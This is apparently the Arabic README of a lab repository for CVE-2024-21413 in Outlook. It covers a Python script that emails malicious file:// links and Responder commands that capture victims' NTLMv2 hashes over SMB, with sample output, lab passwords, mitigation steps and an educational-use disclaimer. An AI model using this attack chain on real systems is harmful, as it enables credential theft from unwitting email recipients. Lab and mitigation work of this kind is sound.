
مختبر تعليمي يوضح استغلال ثغرة CVE-2024-21413 في Outlook باستخدام أداة استغلال Python للبريد الإلكتروني وResponder لالتقاط بيانات اعتماد NTLM في بيئة Windows خاضعة للتحكم.
#CVE-2024-21413 – ثغرة مختبر Outlook
وصف الثغرة
CVE-2024-21413 هي ثغرة حرجة اكتُشفت في Microsoft Outlook تسمح لمهاجم عن بُعد بتنفيذ روابط خبيثة عبر بريد إلكتروني مصمم بعناية. يستغل هذا الاستغلال بروتوكول file:// لإعادة توجيه الضحايا إلى مشاركات SMB يتحكم فيها المهاجم، مما قد يؤدي إلى كشف بيانات اعتماد NTLM أو وصول غير مصرح به إلى الملفات المحلية.
كلمة مرور المستخدم victim هي victim في مختبر Windows 10، وكلمة مرور الخادم hMailServer هي victim
كلمة مرور البريد الإلكتروني [email protected] هي victim، وكلمة مرور البريد الإلكتروني [email protected] هي hacker
قم بتثبيت python3 في مختبر Windows 10:
سنفتح cmd كمسؤول:
pip install pyautogui
pip install Pillow
pip install opencv-python
سيتعين علينا تنزيل السكربت التالي في مختبر Windows 10:
startServicesWindows.py
python3 startServicesWindows.py
لبدء تشغيل خادم البريد وOutlook، من أجل تجهيز البيئة.
Attack Vector: يبدأ الهجوم بإرسال بريد إلكتروني يحتوي على رابط file:// إلى الضحية. عند النقر عليه، يحاول النظام الاتصال بالمشاركة البعيدة المحددة، مما قد يعرض بيانات اعتماد NTLMv2 للخطر أو يصل إلى مورد محلي مخترق.
الأثر: سرقة بيانات اعتماد NTLM، أو تنفيذ أوامر عن بُعد، أو استغلال الملفات المحلية.
خادم SMTP فعّال.
الوصول إلى كمبيوتر الضحية عبر Outlook.
بيانات اعتماد صالحة لمرسل البريد الإلكتروني.
يحتوي هذا المستودع على أداتين مصممتين للاختبار في بيئة خاضعة للسيطرة:
أداة مساعدة مكتوبة بـPython تعمل على أتمتة إرسال رسائل بريد إلكتروني تحتوي على روابط file:// خبيثة لاختبار الثغرة في بيئات آمنة.
تتيح لك تكوين المرسل والمستلم وكلمة مرور المرسل.
رابط مدمج في نص البريد الإلكتروني يستغل بروتوكول file://.
مصممة للعمل مع خادم SMTP.
قم بتثبيت التبعيات الضرورية:
pip install rich
python3 exploitSendEmailOutlook.py
عنوان البريد الإلكتروني للمرسل (attacker).
عنوان البريد الإلكتروني للمستلم (victim).
Password الخاصة بالمرسل.
عنوان IP لخادم SMTP.
سيتم إرسال البريد الإلكتروني تلقائيًا إذا نجحت المصادقة والاتصال.
Intentando conectar al servidor SMTP...
Conexión establecida con el servidor SMTP.
Intentando iniciar sesión en el servidor SMTP...
Autenticación exitosa.
Enviando correo...
Correo enviado exitosamente.
Responder هي أداة متقدمة لاختبار الاختراق تعمل كخادم fake SMB لالتقاط بيانات اعتماد NTLMv2 عندما يحاول نظام المصادقة.
تلتقط تجزئات NTLMv2 من محاولات المصادقة.
دعم لعدة بروتوكولات (SMB, HTTP, FTP, among others).
مثالية لاختبار هذه vulnerability.
قم بتثبيت responder على جهازك المهاجم.
sudo apt update && sudo apt install responder
sudo responder -I <NETWORK_INTERFACE> -v
أو أيضًا باستخدام السكربت الخاص بي:
python3 captureHashResponder.py
أبقِ الخادم يعمل وانتظر حتى يصل الضحايا إلى رابط file:// الخبيث المرسل.
[SMB] NTLMv2-SSP Client : 192.168.1.100
[SMB] NTLMv2-SSP Username : VICTIM-PC\user
[SMB] NTLMv2-SSP Hash : e5d5c82d3e44bf4...etc
حظر بروتوكول file://:
قم بتكوين عميل البريد الإلكتروني الخاص بك لتجنب الروابط التي تستخدم بروتوكول file://.
تعطيل الإرسال التلقائي لبيانات اعتماد NTLM:
افتح Group Policy Editor.
انتقل إلى Security Settings > Local Policies > Security Options.
قم بتكوين أمان الشبكة: تقييد استخدام NTLM: رفض حركة مرور NTLM الصادرة إلى الخوادم البعيدة.
تحديث الأمان:
طبّق أحدث التصحيحات الأمنية المقدمة من Microsoft.
استخدام كلمات مرور قوية والمصادقة متعددة العوامل (MFA):
هذا يقلل من الأثر إذا تم اختراق بيانات الاعتماد.
هذه الأداة والسكربتات المرفقة مخصصة لأغراض تعليمية فقط وللاختبار في بيئات خاضعة للسيطرة وبإذن صريح. إساءة استخدام هذه الأدوات في أنشطة ضارة illegal وتخضع لعقوبات قانونية صارمة.
يتم توزيع هذا المشروع بموجب رخصة MIT. راجع ملف LICENSE للحصول على التفاصيل.
إذا كانت لديك أسئلة أو ترغب في التعاون، فلا تتردد في الاتصال بي:
المؤلف: d1se0
البريد: [email protected]